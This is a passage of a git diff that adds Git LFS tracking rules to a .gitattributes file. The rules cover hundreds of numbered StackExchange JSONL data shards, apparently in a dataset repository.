diff --git a/.gitattributes b/.gitattributes
index f17e700e480835ad0d9a2e78b2ff9f74e701adff..ea1ee0e39a519b4fd71b4438e42662b98e8984ae 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -17019,3 +17019,2292 @@ data/stackexchange/6-10/3_6.jsonl filter=lfs diff=lfs merge=lfs -text
 data/stackexchange/6-10/4_6.jsonl filter=lfs diff=lfs merge=lfs -text
 data/stackexchange/6-10/5_6.jsonl filter=lfs diff=lfs merge=lfs -text
 data/stackexchange/6-10/6_6.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/0_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1000_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1001_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1002_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1003_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1004_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1005_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1006_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1007_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1008_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1009_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/100_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1010_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1011_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1012_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1013_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1014_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1015_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1016_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1017_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1018_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1019_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/101_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1020_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1021_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1022_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1023_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1024_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1025_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1026_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1027_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1028_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1029_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/102_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1030_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1031_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1032_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1033_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1034_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1035_2289.jsonl filter=lfs diff=lfs merge=lfs -text
+data/stackexchange/1-1/1036_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1037_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1038_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1039_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/103_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1040_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1041_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1042_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1043_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1044_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1045_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1046_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1047_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1048_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1049_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/104_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1050_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1051_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1052_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1053_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1054_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1055_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1056_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1057_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1058_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1059_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/105_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1060_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1061_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1062_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1063_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1064_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1065_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1066_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1067_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1068_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1069_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/106_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1070_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1071_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1072_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1073_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1074_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1075_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1076_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1077_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1078_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1079_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/107_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1080_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1081_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1082_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1083_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1084_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1085_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1086_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1087_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1088_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1089_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/108_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1090_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1091_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1092_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1093_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1094_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1095_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1096_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1097_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1098_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1099_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/109_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/10_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1100_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1101_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1102_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1103_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1104_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1105_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1106_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1107_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1108_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1109_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/110_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1110_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1111_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1112_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1113_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1114_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1115_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1116_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1117_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1118_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1119_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/111_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1120_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1121_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1122_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1123_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1124_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1125_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1126_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1127_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1128_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1129_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/112_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1130_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1131_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1132_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1133_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1134_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1135_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1136_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1137_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1138_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1139_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/113_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1140_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1141_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1142_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1143_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1144_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1145_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1146_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1147_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1148_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1149_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/114_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1150_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1151_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1152_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1153_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1154_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1155_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1156_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1157_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1158_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1159_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/115_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1160_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1161_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/1162_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1163_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1164_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1165_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1166_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1167_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1168_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1169_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/116_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1170_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1171_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1172_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1173_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1174_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1175_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1176_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1177_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1178_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1179_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/117_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1180_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1181_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1182_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1183_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1184_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1185_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1186_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1187_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1188_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1189_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/118_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1190_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1191_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1192_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1193_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1194_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1195_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1196_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1197_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1198_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1199_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/119_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/11_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1200_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1201_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1202_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1203_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1204_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1205_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1206_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1207_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1208_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1209_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/120_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1210_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1211_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1212_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1213_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1214_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1215_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1216_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1217_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1218_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1219_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/121_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1220_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1221_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1222_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1223_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1224_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1225_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1226_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1227_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1228_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1229_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/122_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1230_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1231_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1232_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1233_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1234_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1235_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1236_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1237_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1238_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1239_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/123_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1240_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1241_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1242_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1243_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1244_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1245_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1246_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1247_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1248_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1249_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/124_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1250_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1251_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1252_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1253_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1254_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1255_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1256_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1257_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1258_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1259_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/125_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1260_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1261_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1262_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1263_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1264_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1265_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1266_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1267_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1268_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1269_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/126_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1270_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1271_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1272_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1273_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1274_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1275_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1276_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1277_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1278_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1279_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/127_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1280_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1281_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1282_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1283_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1284_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1285_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1286_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1287_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1288_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/1289_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/128_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1290_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1291_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1292_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1293_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1294_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1295_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1296_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1297_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1298_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1299_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/129_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/12_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1300_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1301_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1302_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1303_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1304_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1305_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1306_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1307_2289.jsonl 